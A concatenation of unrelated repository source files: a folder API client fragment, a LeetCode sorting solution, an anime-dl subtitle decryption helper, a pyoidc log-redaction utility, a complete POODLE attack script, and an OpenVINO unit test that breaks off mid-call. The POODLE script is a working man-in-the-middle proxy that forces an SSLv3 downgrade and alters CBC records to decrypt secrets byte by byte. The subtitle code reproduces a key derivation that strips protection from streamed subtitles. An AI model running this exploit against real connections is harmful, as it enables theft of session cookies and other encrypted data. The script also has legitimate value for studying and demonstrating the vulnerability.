response_data = api.call('/folder/loadTree', None)
return FolderModel.load(response_data['payload'])
@classmethod
def load(cls, identifier):
api = cls.instance()
response_data = api.call('/folder/find?id={}'.format(identifier), None)
return FolderModel.load(response_data['payload'])
@classmethod
def load_by_name(cls, dir_name):
folder = cls.load_tree()
directory = cls.search_tree(folder, dir_name)
if directory is not None:
api = cls.instance()
response_data = api.call('/folder/{}/load'.format(directory.id), None)
return FolderModel.load(response_data['payload'])
@classmethod
def search_tree(cls, folder, dir_name):
dirs = cls.collect_dirs(None, folder)
for directory in dirs:
if directory.name == dir_name:
return directory
@classmethod
def collect_dirs(cls, dirs, folder):
if dirs is None:
dirs = []
for child in folder.child_folders:
dirs.append(child)
cls.collect_dirs(dirs, child)
return dirs
|
Algo and DSA/LeetCode-Solutions-master/Python/sort-features-by-popularity.py | Sourav692/FAANG-Interview-Preparation | 3,269 | 12635675 | # Time: O(nlogn)
# Space: O(n)
import collections
class Solution(object):
def sortFeatures(self, features, responses):
"""
:type features: List[str]
:type responses: List[str]
:rtype: List[str]
"""
features_set = set(features)
order = {word: i for i, word in enumerate(features)}
freq = collections.defaultdict(int)
for r in responses:
for word in set(r.split(' ')):
if word in features_set:
freq[word] += 1
features.sort(key=lambda x: (-freq[x], order[x]))
return features
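# Worked example (made-up input):
#   features  = ["cooler", "lock", "touch"]
#   responses = ["i like cooler cooler", "lock touch cool", "locker like touch"]
#   'touch' appears in two responses while 'cooler' and 'lock' appear in one each
#   (duplicates inside a single response count once), so the result is
#   ["touch", "cooler", "lock"] -- ties keep the original feature order.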
|
anime_dl/sites/supporters/sub_fetcher.py | tiagotda/anime-dl | 246 | 12635678 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import anime_dl.common
from anime_dl.external.aes import aes_cbc_decrypt
from anime_dl.external.compat import compat_etree_fromstring
from anime_dl.external.utils import bytes_to_intlist, intlist_to_bytes
import re
import logging
import os
import base64
import zlib
from hashlib import sha1
from math import pow, sqrt, floor
def crunchyroll_subs(xml, episode_number, file_name):
headers = {
'User-Agent':
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7',
'Referer':
'https://www.crunchyroll.com'
}
for sub_id, sub_lang, sub_lang2 in re.findall(
r'subtitle_script_id\=(.*?)\"\ title\=\"\[(.*?)\]\ (.*?)\"',
str(xml)):
xml_return = anime_dl.common.browser_instance.page_downloader(url="http://www.crunchyroll.com/xml/?req=RpcApiSubtitle_GetXml&subtitle_script_id={0}".format(sub_id), headers=headers)
iv = str(re.search(r'\<iv\>(.*?)\<\/iv\>', str(xml_return)).group(1)).strip()
data = str(re.search(r'\<data\>(.*?)\<\/data\>', str(xml_return)).group(1)).strip()
subtitle = _decrypt_subtitles(data, iv, sub_id).decode('utf-8')
sub_root = compat_etree_fromstring(subtitle)
sub_data = _convert_subtitles_to_ass(sub_root)
lang_code = str(
re.search(r'lang_code\=\"(.*?)\"', str(subtitle)).group(
1)).strip()
sub_file_name = str(file_name).replace(".mp4", ".") + str(lang_code) + ".ass"
print("Downloading {0} ...".format(sub_file_name))
try:
with open(str(os.getcwd()) + "/" + str(sub_file_name), "wb") as sub_file:
sub_file.write(sub_data.encode("utf-8"))
except Exception as EncodingException:
print("Couldn't write the subtitle file...skipping.")
pass
logging.debug("\n----- Subs Downloaded -----\n")
return True
def _decrypt_subtitles(data, iv, id):
data = bytes_to_intlist(base64.b64decode(data.encode('utf-8')))
iv = bytes_to_intlist(base64.b64decode(iv.encode('utf-8')))
id = int(id)
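    # Scheme implemented below: data and iv arrive base64-encoded, the AES key is derived
    # from the numeric subtitle id (obfuscate_key mixes the id with a constant, SHA-1 hashes
    # it behind an obfuscated prefix and zero-pads the digest to 256 bits), and the ciphertext
    # is AES-CBC decrypted and then zlib-decompressed.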
def obfuscate_key_aux(count, modulo, start):
output = list(start)
for _ in range(count):
output.append(output[-1] + output[-2])
# cut off start values
output = output[2:]
output = list(map(lambda x: x % modulo + 33, output))
return output
def obfuscate_key(key):
num1 = int(floor(pow(2, 25) * sqrt(6.9)))
num2 = (num1 ^ key) << 5
num3 = key ^ num1
num4 = num3 ^ (num3 >> 3) ^ num2
prefix = intlist_to_bytes(obfuscate_key_aux(20, 97, (1, 2)))
shaHash = bytes_to_intlist(
sha1(prefix + str(num4).encode('ascii')).digest())
# Extend 160 Bit hash to 256 Bit
return shaHash + [0] * 12
key = obfuscate_key(id)
decrypted_data = intlist_to_bytes(aes_cbc_decrypt(data, key, iv))
return zlib.decompress(decrypted_data)
def _convert_subtitles_to_ass(sub_root):
output = ''
def ass_bool(strvalue):
assvalue = '0'
if strvalue == '1':
assvalue = '-1'
return assvalue
output = '[Script Info]\n'
output += 'Title: %s\n' % sub_root.attrib['title']
output += 'ScriptType: v4.00+\n'
output += 'WrapStyle: %s\n' % sub_root.attrib['wrap_style']
output += 'PlayResX: %s\n' % sub_root.attrib['play_res_x']
output += 'PlayResY: %s\n' % sub_root.attrib['play_res_y']
output += """
[V4+ Styles]
Format: Name, Fontname, Fontsize, PrimaryColour, SecondaryColour, OutlineColour, BackColour, Bold, Italic, Underline, StrikeOut, ScaleX, ScaleY, Spacing, Angle, BorderStyle, Outline, Shadow, Alignment, MarginL, MarginR, MarginV, Encoding
"""
for style in sub_root.findall('./styles/style'):
output += 'Style: ' + style.attrib['name']
output += ',' + style.attrib['font_name']
output += ',' + style.attrib['font_size']
output += ',' + style.attrib['primary_colour']
output += ',' + style.attrib['secondary_colour']
output += ',' + style.attrib['outline_colour']
output += ',' + style.attrib['back_colour']
output += ',' + ass_bool(style.attrib['bold'])
output += ',' + ass_bool(style.attrib['italic'])
output += ',' + ass_bool(style.attrib['underline'])
output += ',' + ass_bool(style.attrib['strikeout'])
output += ',' + style.attrib['scale_x']
output += ',' + style.attrib['scale_y']
output += ',' + style.attrib['spacing']
output += ',' + style.attrib['angle']
output += ',' + style.attrib['border_style']
output += ',' + style.attrib['outline']
output += ',' + style.attrib['shadow']
output += ',' + style.attrib['alignment']
output += ',' + style.attrib['margin_l']
output += ',' + style.attrib['margin_r']
output += ',' + style.attrib['margin_v']
output += ',' + style.attrib['encoding']
output += '\n'
output += """
[Events]
Format: Layer, Start, End, Style, Name, MarginL, MarginR, MarginV, Effect, Text
"""
for event in sub_root.findall('./events/event'):
output += 'Dialogue: 0'
output += ',' + event.attrib['start']
output += ',' + event.attrib['end']
output += ',' + event.attrib['style']
output += ',' + event.attrib['name']
output += ',' + event.attrib['margin_l']
output += ',' + event.attrib['margin_r']
output += ',' + event.attrib['margin_v']
output += ',' + event.attrib['effect']
output += ',' + event.attrib['text']
output += '\n'
return output
|
src/oic/utils/sanitize.py | kschu91/pyoidc | 373 | 12635710 | <filename>src/oic/utils/sanitize.py
import re
from collections.abc import Mapping
from textwrap import dedent
SENSITIVE_THINGS = {
"password",
"<PASSWORD>",
"client_secret",
"code",
"authorization",
"access_token",
"refresh_token",
}
REPLACEMENT = "<REDACTED>"
SANITIZE_PATTERN = r"""
(?<!_) # Negative-lookbehind for underscore.
# Necessary to keep 'authorization_code' from matching 'code'
( # Start of capturing group--we'll keep this bit.
(?: # non-capturing group
{} # Template-in things we want to sanitize
) #
['\"]? # Might have a quote after them?
\s* # Maybe some whitespace
[=:,] # Probably a : , or = in tuple, dict or qs format
\s* # Maybe more whitespace
[([]? # Could be inside a list/tuple, parse_qs?
([bu][\"'])? # Python 2
[\"']? # Might be a quote here.
) # End of capturing group
(?:[%=/+\w]+) # This is the bit we replace with '<REDACTED>'
"""
SANITIZE_PATTERN = dedent(SANITIZE_PATTERN.format("|".join(SENSITIVE_THINGS)))
SANITIZE_REGEX = re.compile(SANITIZE_PATTERN, re.VERBOSE | re.IGNORECASE | re.UNICODE)
def redacted(key, value):
if key in SENSITIVE_THINGS:
return (key, REPLACEMENT)
return (key, value)
def sanitize(potentially_sensitive):
if isinstance(potentially_sensitive, Mapping):
# Makes new dict so we don't modify the original
# Also case-insensitive--possibly important for HTTP headers.
return dict(redacted(k.lower(), v) for k, v in potentially_sensitive.items())
else:
if not isinstance(potentially_sensitive, str):
potentially_sensitive = str(potentially_sensitive)
return SANITIZE_REGEX.sub(r"\1{}".format(REPLACEMENT), potentially_sensitive)
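# A minimal usage sketch (values are made up):
#
#   sanitize({'Authorization': 'Bearer abc', 'state': 'xyz'})
#   # -> {'authorization': '<REDACTED>', 'state': 'xyz'}
#
#   sanitize('grant_type=authorization_code&code=SplxlOBeZQQYbYS6WxSbIA')
#   # -> 'grant_type=authorization_code&code=<REDACTED>'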
|
poodle-exploit.py | RootDev4/POODLE-PoC | 207 | 12635731 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Poodle attack implementation
Author: mpgn <<EMAIL>>
Created: 03/2018 - Python3
License: MIT
'''
import argparse
import binascii
import os
import re
import select
import socket
import socketserver
import struct
import sys
import threading
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
MAJ = '\033[45m'
BLUE = '\033[44m'
ORANGE = '\033[43m'
CYAN = '\033[46m'
RED = '\033[41m'
GREEN = '\033[42m'
YELLOW = '\033[100m'
class Poodle():
def __init__(self):
self.length_block = 8
self.length_block_found = False
self.first_packet_found = False
self.find_block_length = False
self.first_packet = ''
self.ssl_header = ''
self.frame = ''
self.data_altered = False
self.decipherable = False
self.count = 0
self.decipher_byte = ""
self.secret = []
self.length_request = 0
self.current_block = args.start_block
self.secret_block = []
self.packet_count = 0
self.downgrade = False
self.length_previous_block = 0
def exploit(self, content_type, version, length, data):
        # if there is application data and it is not a favicon (see issue #7)
if content_type == 23 and length > 24 and length >= len(self.first_packet):
traffic.favicon = True
# save the first packet, so we can generate a wrong HMAC when we want
# TODO : remove this and just alter the last byte of the packet when length of the
# block is found
if self.first_packet_found == False:
self.first_packet = data
self.ssl_header = struct.pack('>BHH', content_type, version, length)
self.first_packet_found = True
# find the length of a block and return an HMAC error when we find the length
if self.find_block_length == True:
if poodle.find_size_of_block(length) == 1:
return self.first_packet, self.ssl_header
# exploit exploit exploit
if self.length_block_found == True:
self.data_altered = True
if args.stop_block == 0:
                self.total_block = (len(data) // self.length_block) - 2
else:
self.total_block = args.stop_block
request = self.split_len(binascii.hexlify(data), 16)
request[-1] = request[self.current_block]
pbn = request[-2]
pbi = request[self.current_block - 1]
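            # POODLE math: the last block has been replaced by the target block C_i, so the
            # server computes D(C_i) XOR C_{n-1}. When the padding is accepted, the last byte
            # of that result equals block_length-1, hence the target plaintext byte is
            # (block_length-1) XOR last_byte(C_{n-1}) XOR last_byte(C_{i-1}).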
self.decipher_byte = chr((self.length_block-1) ^ int(pbn[-2:],16) ^ int(pbi[-2:],16))
sys.stdout.write("\r[+] Sending request \033[36m%3d\033[0m - Block %d/%d : [%*s]" % (self.count, self.current_block, self.total_block, self.length_block, ''.join(self.secret_block[::-1])))
sys.stdout.flush()
data = binascii.unhexlify(b''.join(request))
return data, struct.pack('>BHH', content_type, version, length)
def decipher(self):
self.secret_block.append(self.decipher_byte.encode("unicode_escape").decode("utf-8"))
sys.stdout.write("\r[+] Sending request \033[36m%3d\033[0m - Block %d/%d : [%*s]" % (self.count, self.current_block, self.total_block, self.length_block, ''.join(self.secret_block[::-1])))
sys.stdout.flush()
if len(self.secret_block) == self.length_block and self.current_block < (self.total_block):
print('')
self.secret += self.secret_block[::-1]
self.current_block = self.current_block + 1
self.secret_block = []
elif len(self.secret_block) == self.length_block and self.current_block == self.total_block:
# stop the attack and go to passive mode
self.secret += self.secret_block[::-1]
self.secret_block = []
poodle.length_block_found = False
print('\nStopping the attack...')
def decipher2(self):
print(self.decipher_byte.encode("unicode_escape").decode("utf-8"))
def split_len(self, seq, length):
return [seq[i:i+length] for i in range(0, len(seq), length)]
def find_size_of_block(self, length_current_block):
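        # Driven by the findlengthblock() helper in the injected JS, which pads each request a
        # little more every call: when the encrypted record length jumps by a whole block
        # (8 or 16 bytes) between two requests, that jump is the CBC block size.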
print(str(length_current_block), str(self.length_previous_block), str(length_current_block - self.length_previous_block))
if (length_current_block - self.length_previous_block) == 8 or (length_current_block - self.length_previous_block) == 16:
print("CBC block size " + str(length_current_block - self.length_previous_block))
self.length_block = length_current_block - self.length_previous_block
return 1
else:
self.length_previous_block = length_current_block
return 0
class Traffic():
def __init__(self):
self.protocol_all = { 768:[' SSLv3.0 ',bcolors.RED], 769:[' TLSv1.0 ',bcolors.GREEN], 770:[' TLSv1.1 ',bcolors.GREEN], 771:[' TLSv1.2 ',bcolors.GREEN], 772:[' TLSv1.3 ',bcolors.GREEN]}
self.protocol_current = ''
self.protocol_current_color = bcolors.GREEN
self.protocol_downgrade = 0
self.favicon = False
def info_traffic(self, color1, protocol, color2, status):
print(''.rjust(int(columns)-20) + color1 + bcolors.BOLD + protocol + color2 + bcolors.BOLD + status + bcolors.ENDC)
class ProxyTCPHandler(socketserver.BaseRequestHandler):
"""
    The proxy responds to the CONNECT packet, then simply forwards SSL records between the
    client and the server. When active mode is enabled, the proxy alters the encrypted data
    sent to the server.
"""
def handle(self):
# Connection to the secure server
socket_server = socket.create_connection((args.server, args.rport))
# input allow us to monitor the socket of the client and the server
inputs = [socket_server, self.request]
running = True
connect = args.simpleProxy
while running:
readable = select.select(inputs, [], [])[0]
for source in readable:
if source is socket_server:
try:
data = socket_server.recv(1024)
except socket.error as err:
running = False
break
# print 'Server -> proxy -> client'
if len(data) == 0:
running = False
break
(content_type, version, length) = struct.unpack('>BHH', data[0:5])
if poodle.data_altered == True:
poodle.count = poodle.count + 1
if content_type == 23:
# 23 -> Application data (no HMAC error)
poodle.decipher()
poodle.count = 0
# elif content_type == 21:
# 21 -> HMAC error
poodle.data_altered = False
poodle.packet_count += 1
if poodle.find_block_length == False and poodle.length_block_found == False and poodle.downgrade == False:
sys.stdout.write("\r[OK] -> packed send and receive %3s %s %s" % (poodle.packet_count, ''.rjust(int(columns)-56), traffic.protocol_current_color + traffic.protocol_current + bcolors.BLUE + bcolors.BOLD + ' passive ' + bcolors.ENDC))
# cursor at the end, tssss
sys.stdout.write("\r[OK] -> packed send and receive %3s" % (poodle.packet_count))
sys.stdout.flush()
if poodle.downgrade == True and traffic.protocol_current != ' SSLv3.0 ' and traffic.protocol_downgrade == 0:
print("Sending handshake failure")
self.request.send(binascii.unhexlify("15030000020228"))
traffic.protocol_downgrade = 1
                        poodle.downgrade = False
else:
# we send data to the client
self.request.send(data)
elif source is self.request:
if connect == True:
# print 'Client -> proxy'
data = self.request.recv(1024)
connect = False
if 'CONNECT' in str(data):
data = "HTTP/1.0 200 Connection established\r\n\r\n"
self.request.send(data.encode())
break
else:
# print 'Client -> proxy -> server'
try:
ssl_header = self.request.recv(5)
except struct.error as err:
break
if ssl_header == '':
running = False
break
try:
(content_type, version, length) = struct.unpack('>BHH', ssl_header)
# print("client -> server", str(content_type), str(version), str(length))
try:
traffic.protocol_current = traffic.protocol_all[version][0]
traffic.protocol_current_color = traffic.protocol_all[version][1]
except KeyError as err:
# avoid error if the protocol is SSLv2.0
traffic.protocol_current = traffic.protocol_all[length][0]
traffic.protocol_current_color = traffic.protocol_all[length][1]
except struct.error as err:
# avoid error in chrome browser
return
if traffic.protocol_downgrade == 1 and content_type == 23:
traffic.info_traffic(traffic.protocol_current_color,traffic.protocol_current,bcolors.YELLOW, ' downgrade ')
traffic.protocol_downgrade = 0
data = self.request.recv(length)
(data, ssl_header) = poodle.exploit(content_type, version, length, data)
data_full = ssl_header+data
# we send data to the server
poodle.packet_count += 1
socket_server.send(data_full)
return
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Poodle Exploit by @mpgn_x64')
parser.add_argument('proxy', help='ip of the proxy')
parser.add_argument('port', type=int, help='port of the proxy')
parser.add_argument('server', help='ip of the remote server')
parser.add_argument('rport', type=int, help='port of the remote server')
parser.add_argument('--start-block', type=int, default=1, help='start the attack at this block')
parser.add_argument('--stop-block', type=int, default=0, help='stop the attack at this block')
parser.add_argument('--simpleProxy', type=int, default=0, help='Direct proxy, no ARP spoofing attack')
args = parser.parse_args()
rows, columns = os.popen('stty size', 'r').read().split()
# Create server and bind to set ip
poodle = Poodle()
socketserver.TCPServer.allow_reuse_address = True
httpd = socketserver.TCPServer((args.proxy, args.port), ProxyTCPHandler)
proxy = threading.Thread(target=httpd.serve_forever)
proxy.daemon=True
proxy.start()
traffic = Traffic()
print('Proxy is launched on {!r} port {}'.format(args.proxy, args.port))
print('Passive mode enabled by default')
print('\nType help to show all command line, ' + bcolors.BLUE + bcolors.BOLD + 'passive' + bcolors.ENDC + ' mode is by default enabled\n')
#print(''.rjust(int(columns)-9) + bcolors.BLUE + bcolors.BOLD + ' passive ' + bcolors.ENDC)
while True:
try:
input_u = input(bcolors.BOLD + "> " + bcolors.ENDC)
if input_u == 'active':
print('Active mode enabled, waiting for data... sendAttack()')
poodle.find_block_length = False
poodle.length_block_found = True
poodle.downgrade = False
traffic.info_traffic(traffic.protocol_current_color,traffic.protocol_current,bcolors.MAJ, ' active ')
elif input_u == 'search':
print('Waiting for data... findlengthblock()')
poodle.find_block_length = True
poodle.length_block_found = False
poodle.downgrade = False
traffic.info_traffic(traffic.protocol_current_color,traffic.protocol_current,bcolors.ORANGE, ' search ')
elif input_u == 'downgrade':
print('Downgrade the protocol to SSLv3')
poodle.downgrade = True
elif input_u == "passive":
print('Passive mode enabled')
poodle.find_block_length = False
poodle.length_block_found = False
poodle.length_block = 8
poodle.downgrade = False
traffic.info_traffic(traffic.protocol_current_color,traffic.protocol_current,bcolors.BLUE, ' passive ')
elif input_u == "help":
print('~~~~Help command line~~~~\n')
print(bcolors.BOLD + 'downgrade' + bcolors.ENDC + ': downgrade the protocol to SSLv3 (not working on firefox)')
print(bcolors.BOLD + 'search' + bcolors.ENDC + ': find the block length (8 or 16). Use the command findlengthblock() in JS after launch this command')
print(bcolors.BOLD + 'active' + bcolors.ENDC + ': active mode alter the data. Use the command sendAttack() in the JS after launch this command ')
print(bcolors.BOLD + 'passive' + bcolors.ENDC + ': passive mode does not alter the data. Use the command reset() in the JS after launch this command ')
print(bcolors.BOLD + 'exit' + bcolors.ENDC + ': show deciphered byte and exit the program properly')
elif input_u == "exit":
print("Exiting...")
break
except KeyboardInterrupt:
print("Exiting...")
print("Stopping proxy... bye bye")
break
print("\n\033[32m{-} Deciphered plaintext\033[0m :", ('').join(poodle.secret))
|
model-optimizer/unit_tests/extensions/ops/interpolate_test.py | monroid/openvino | 2,406 | 12635736 | <filename>model-optimizer/unit_tests/extensions/ops/interpolate_test.py
# Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import unittest
import numpy as np
from generator import generator, generate
from extensions.ops.interpolate import Interpolate
from mo.front.common.partial_infer.utils import int64_array
from mo.graph.graph import Node
from unit_tests.utils.graph import build_graph
graph_node_attrs_without_axes = {
'input': {'type': 'Parameter', 'kind': 'op'},
'input_data': {'kind': 'data', 'shape': None, 'value': None},
'sizes': {'type': 'Const', 'kind': 'op', 'shape': None, 'value': None},
'sizes_data': {'kind': 'data', 'shape': None, 'value': None},
'scales': {'type': 'Const', 'kind': 'op', 'shape': None, 'value': None},
'scales_data': {'kind': 'data', 'shape': None, 'value': None},
'interpolate': {
'type': 'Interpolate', 'kind': 'op', 'mode': 'nearest', 'shape_calculation_mode': 'sizes',
'coordinate_transformation_mode': 'half_pixel', 'version': 'opset4',
'nearest_mode': 'round_prefer_floor', 'antialias': 0,
},
'interpolate_data': {'kind': 'data', 'value': None, 'shape': None},
'op_output': {'kind': 'op', 'op': 'Result'},
}
graph_edges_without_axes = [
('input', 'input_data'),
('sizes', 'sizes_data'),
('scales', 'scales_data'),
('input_data', 'interpolate', {'in': 0}),
('sizes_data', 'interpolate', {'in': 1}),
('scales_data', 'interpolate', {'in': 2}),
('interpolate', 'interpolate_data'),
('interpolate_data', 'op_output'),
]
graph_nodes_attrs = {
'input': {'type': 'Parameter', 'kind': 'op'},
'input_data': {'kind': 'data', 'shape': None, 'value': None},
'sizes': {'type': 'Const', 'kind': 'op', 'shape': None, 'value': None},
'sizes_data': {'kind': 'data', 'shape': None, 'value': None},
'scales': {'type': 'Const', 'kind': 'op', 'shape': None, 'value': None},
'scales_data': {'kind': 'data', 'shape': None, 'value': None},
'axes': {'type': 'Const', 'kind': 'op', 'shape': None, 'value': None},
'axes_data': {'kind': 'data', 'shape': None, 'value': None},
'interpolate': {
'type': 'Interpolate', 'kind': 'op', 'mode': 'nearest', 'shape_calculation_mode': 'sizes',
'coordinate_transformation_mode': 'half_pixel', 'version': 'opset4',
'nearest_mode': 'round_prefer_floor', 'antialias': 0,
},
'interpolate_data': {'kind': 'data', 'value': None, 'shape': None},
'op_output': {'kind': 'op', 'op': 'Result'},
}
graph_edges = [
('input', 'input_data'),
('sizes', 'sizes_data'),
('scales', 'scales_data'),
('axes', 'axes_data'),
('input_data', 'interpolate', {'in': 0}),
('sizes_data', 'interpolate', {'in': 1}),
('scales_data', 'interpolate', {'in': 2}),
('axes_data', 'interpolate', {'in': 3}),
('interpolate', 'interpolate_data'),
('interpolate_data', 'op_output'),
]
@generator
class TestInterpolateOp(unittest.TestCase):
@generate(*[([0], [0], [1, 3, 100, 200], [1, 3, 350, 150], [350, 150], [3.5, 150 / 200], [2, 3]),
([0, 3, 10, 10], [0], [16, 7, 190, 400], [8, 10, 390, 600],
[8, 390, 600], [0.5, 390 / 200, 600 / 410], [0, 2, 3]),
([10, 5, 0, 10], [0, 4, 16, 18], [4, 33, 1024, 8000], [56, 42, 520, 8028],
[56, 520], [4.0, 0.5], [0, 2]),
([0], [0], [1, 16, 85, 470, 690], [20, 16, 40, 470, 1380],
[20, 40, 1380], [20.0, 40.0 / 85.0, 1380.0 / 690.0], [0, 2, 4]),
([4, 3, 11, 22, 5], [1, 3, 4, 8, 5], [1, 16, 85, 470, 690], [60, 22, 430, 500, 345],
[60, 430, 345], [10.0, 4.3, 345.0 / 700.0], [0, 2, 4]),
([0], [0], [5, 77, 444, 88, 6050], [100, 308, 4440, 44, 6050],
[100, 308, 4440, 44], [20.0, 4.0, 10.0, 0.5], [0, 1, 2, 3]),
([0], [0], [1, 100, 200], [1, 350, 150], [350, 150], [3.5, 150 / 200], [1, 2]),
([0, 3, 10], [0], [16, 7, 190], [8, 10, 390], [8, 390], [0.5, 390 / 200], [0, 2]),
([10, 0, 10], [0, 16, 18], [4, 1024, 8000], [56, 520, 8028], [56, 520], [4.0, 0.5], [0, 1]),
([0], [0], [1, 690], [20, 1380], [20, 1380], [20.0, 1380.0 / 690.0], [0, 1]),
([4, 3, 11, 22, 5, 0], [1, 3, 4, 8, 5, 0], [1, 16, 85, 470, 690, 349], [60, 22, 430, 500, 345, 349],
[60, 430, 345], [10.0, 4.3, 345.0 / 700.0], [0, 2, 4])
])
def test_interpolate4_using_sizes(self, pads_begin, pads_end, input_shape, output_shape, sizes, scales, axes):
graph = build_graph(nodes_attrs=graph_nodes_attrs,
edges=graph_edges,
update_attributes={
'input_data': {'shape': input_shape},
'sizes': {'shape': int64_array(sizes).shape, 'value': int64_array(sizes)},
'sizes_data': {'shape': int64_array(sizes).shape, 'value': int64_array(sizes)},
'scales': {'shape': np.array(scales).shape, 'value': np.array(scales)},
'scales_data': {'shape': np.array(scales).shape, 'value': np.array(scales)},
'axes': {'shape': int64_array(axes).shape, 'value': int64_array(axes)},
'axes_data': {'shape': int64_array(axes).shape, 'value': int64_array(axes)},
'interpolate': {'pads_begin': int64_array(pads_begin),
'pads_end': int64_array(pads_end)}
})
node = Node(graph, 'interpolate')
tested_class = Interpolate(graph=graph, attrs=node.attrs())
tested_class.infer(node)
msg = "Interpolate-4 infer failed for case: sizes={}, scales={}, pads_begin={}, pads_end={}, axes={}," \
" expected_shape={}, actual_shape={}"
self.assertTrue(np.array_equal(graph.node['interpolate_data']['shape'], int64_array(output_shape)),
msg.format(sizes, scales, pads_begin, pads_end, axes, output_shape,
graph.node['interpolate_data']['shape']))
@generate(*[([0], [0], [1, 3, 100, 200], [1, 3, 350, 150], [350, 150], [3.5, 150 / 200], [2, 3]),
([0, 3, 10, 10], [0], [16, 7, 190, 400], [8, 10, 390, 600],
[8, 390, 600], [0.5, 390 / 200, 600 / 410], [0, 2, 3]),
([10, 5, 0, 10], [0, 4, 16, 18], [4, 33, 1024, 8000], [56, 42, 520, 8028],
[56, 520], [4.0, 0.5], [0, 2]),
([0], [0], [1, 16, 85, 470, 690], [20, 16, 40, 470, 1380],
[20, 40, 1380], [20.0, 40.0 / 85.0, 1380.0 / 690.0], [0, 2, 4]),
([4, 3, 11, 22, 5], [1, 3, 4, 8, 5], [1, 16, 85, 470, 690], [60, 22, 430, 500, 345],
[60, 430, 345], [10.0, 4.3, 345.0 / 700.0], [0, 2, 4]),
([0], [0], [5, 77, 444, 88, 6050], [100, 308, 4440, 44, 6050],
[100, 308, 4440, 44], [20.0, 4.0, 10.0, 0.5], [0, 1, 2, 3]),
([0], [0], [1, 100, 200], [1, 350, 150], [350, 150], [3.5, 150 / 200], [1, 2]),
([0, 3, 10], [0], [16, 7, 190], [8, 10, 390], [8, 390], [0.5, 390 / 200], [0, 2]),
([10, 0, 10], [0, 16, 18], [4, 1024, 8000], [56, 520, 8028], [56, 520], [4.0, 0.5], [0, 1]),
([0], [0], [1, 690], [20, 1380], [20, 1380], [20.0, 1380.0 / 690.0], [0, 1]),
([4, 3, 11, 22, 5, 0], [1, 3, 4, 8, 5, 0], [1, 16, 85, 470, 690, 349], [60, 22, 430, 500, 345, 349],
[60, 430, 345], [10.0, 4.3, 345.0 / 700.0], [0, 2, 4]),
([4, 3, 11, 22, 5, 0, 0], [1, 3, 4, 8, 5, 0, 0], [1, 16, 85, 470, 690, 349, 3],
[60, 22, 430, 500, 345, 349, 1],
[60, 430, 345, 1], [10.0, 4.3, 345.0 / 700.0, 1 / 3], [0, 2, 4, 6]),
([4, 3, 11, 22, 5, 0, 0], [1, 3, 4, 8, 5, 0, 0], [1, 16, 85, 470, 690, 349, 3],
[60, 22, 430, 500, 345, 349, 1],
[60, 430, 345, 1], [10.0, 4.3, 345.0 / 700.0, 0.3333333], [0, 2, 4, 6]),
])
def test_interpolate4_using_scales(self, pads_begin, pads_end, input_shape, output_shape, sizes, scales, axes):
graph = build_graph(nodes_attrs=graph_nodes_attrs,
edges=graph_edges,
update_attributes={
'input_data': {'shape': input_shape},
'sizes': {'shape': int64_array(sizes).shape, 'value': int64_array(sizes)},
'sizes_data': {'shape': int64_array(sizes).shape, 'value': int64_array(sizes)},
'scales': {'shape': np.array(scales).shape, 'value': np.array(scales)},
'scales_data': {'shape': np.array(scales).shape, 'value': np.array(scales)},
'axes': {'shape': int64_array(axes).shape, 'value': int64_array(axes)},
'axes_data': {'shape': int64_array(axes).shape, 'value': int64_array(axes)},
'interpolate': {'pads_begin': int64_array(pads_begin),
'pads_end': int64_array(pads_end),
'shape_calculation_mode': 'scales'}
})
node = Node(graph, 'interpolate')
tested_class = Interpolate(graph=graph, attrs=node.attrs())
tested_class.infer(node)
msg = "Interpolate-4 infer failed for case: sizes={}, scales={}, pads_begin={}, pads_end={}, axes={}," \
" expected_shape={}, actual_shape={}"
self.assertTrue(np.array_equal(graph.node['interpolate_data']['shape'], int64_array(output_shape)),
msg.format(sizes, scales, pads_begin, pads_end, axes, output_shape,
graph.node['interpolate_data']['shape']))
@generate(*[([0], [0], [1, 3, 100, 200], [1, 3, 350, 150], [1, 3, 350, 150], [1.0, 1.0, 3.5, 150 / 200]),
([0, 3, 10, 10], [0], [16, 7, 190, 400], [8, 10, 390, 600],
[8, 10, 390, 600], [0.5, 1.0, 390 / 200, 600 / 410]),
([10, 5, 0, 10], [0, 4, 16, 18], [4, 33, 1024, 8000], [56, 42, 520, 8028],
[56, 42, 520, 8028], [4.0, 1.0, 0.5, 1.0]),
([0], [0], [1, 16, 85, 470, 690], [20, 16, 40, 470, 1380],
[20, 16, 40, 470, 1380], [20.0, 1.0, 40.0 / 85.0, 1.0, 1380.0 / 690.0]),
([4, 3, 11, 22, 5], [1, 3, 4, 8, 5], [1, 16, 85, 470, 690], [60, 22, 430, 500, 345],
[60, 22, 430, 500, 345], [10.0, 1.0, 4.3, 1.0, 345.0 / 700.0]),
([0], [0], [5, 77, 444, 88, 6050], [100, 308, 4440, 44, 6050],
[100, 308, 4440, 44, 6050], [20.0, 4.0, 10.0, 0.5, 1.0]),
([0], [0], [1, 100, 200], [1, 350, 150], [1, 350, 150], [1.0, 3.5, 150 / 200]),
([0, 3, 10], [0], [16, 7, 190], [8, 10, 390], [8, 10, 390], [0.5, 1.0, 390 / 200]),
([10, 0, 10], [0, 16, 18], [4, 1024, 8000], [56, 520, 8028], [56, 520, 8028], [4.0, 0.5, 1.0]),
([0], [0], [1, 690], [20, 1380], [20, 1380], [20.0, 1380.0 / 690.0]),
([4, 3, 11, 22, 5, 0], [1, 3, 4, 8, 5, 0], [1, 16, 85, 470, 690, 349], [60, 22, 430, 500, 345, 349],
[60, 22, 430, 500, 345, 349], [10.0, 1.0, 4.3, 1.0, 345.0 / 700.0, 1.0]),
([4, 3, 11, 22, 5, 0, 0], [1, 3, 4, 8, 5, 0, 0], [1, 16, 85, 470, 690, 349, 3],
[60, 22, 430, 500, 345, 349, 1],
[60, 22, 430, 500, 345, 349, 1], [10.0, 1.0, 4.3, 1.0, 345.0 / 700.0, 1.0, 1 / 3]),
])
def test_interpolate4_using_sizes_without_axes(self, pads_begin, pads_end, input_shape, output_shape, sizes,
scales):
graph = build_graph(nodes_attrs=graph_node_attrs_without_axes,
